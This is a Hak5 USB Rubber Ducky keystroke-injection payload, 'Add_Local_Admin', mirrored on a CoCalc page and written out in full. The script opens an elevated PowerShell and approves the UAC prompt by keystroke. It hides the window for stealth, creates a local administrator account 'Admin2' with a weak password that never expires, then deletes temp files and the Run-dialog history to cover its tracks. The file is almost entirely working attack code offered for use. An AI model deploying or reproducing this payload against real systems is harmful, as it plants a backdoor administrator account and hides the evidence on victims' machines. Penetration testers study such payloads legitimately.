Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/execution/Add_Local_Admin/payload.txt
2971 views
1
REM Title: Add_Local_Admin
2
REM Author: LulzAnarchyAnon
3
REM Description: Administrator PowerShell is opened, and resized for a more stealthy payload delivery, then the payload
4
REM creates a local admin account on the target system, afterwards powershell exits, and all history is cleared.
5
REM This lightning fast payload deployed, and was completed in a test run in 10.57 seconds
6
REM Target: Windows 10 and 11
7
REM Props: Darren Kitchen, and I am Jakoby
8
REM Version: 3.0
9
REM Category: Execution
10
11
12
DELAY 200
13
GUI r
14
DELAY 200
15
STRINGLN powershell -Command "Start-Process PowerShell -Verb RunAs"
16
DELAY 500
17
ALT y
18
DELAY 500
19
STRINGLN
20
PowerShell.exe -noe -c ". mode.com con: lines=5 cols=12"
21
$Username = "Admin2"
22
$Password = "password"
23
$group = "Administrators"
24
$adsi = [ADSI]"WinNT://$env:COMPUTERNAME"
25
$existing = $adsi.Children | where {$_.SchemaClassName -eq 'user' -and $_.Name -eq $Username }
26
if ($existing -eq $null) {
27
Write-Host "Creating new local user $Username."
28
& NET USER $Username $Password /add /y /expires:never
29
Write-Host "Adding local user $Username to $group."
30
& NET LOCALGROUP $group $Username /add
31
}
32
{
33
Write-Host "Setting password for existing local user $Username."
34
$existing.SetPassword($Password)
35
}
36
Write-Host "Ensuring password for $Username never expires."
37
& WMIC USERACCOUNT WHERE "Name='$Username'" SET PasswordExpires=FALSE
38
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
39
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
40
exit
41
exit
42
END_STRINGLN
43
44